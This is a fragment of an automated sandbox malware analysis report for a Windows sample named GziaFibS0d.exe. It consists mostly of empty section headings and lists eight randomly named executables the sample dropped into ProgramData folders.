Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe

C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe

C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe

C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe

C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe

C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe

C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe

C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
GziaFibS0d.exe

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON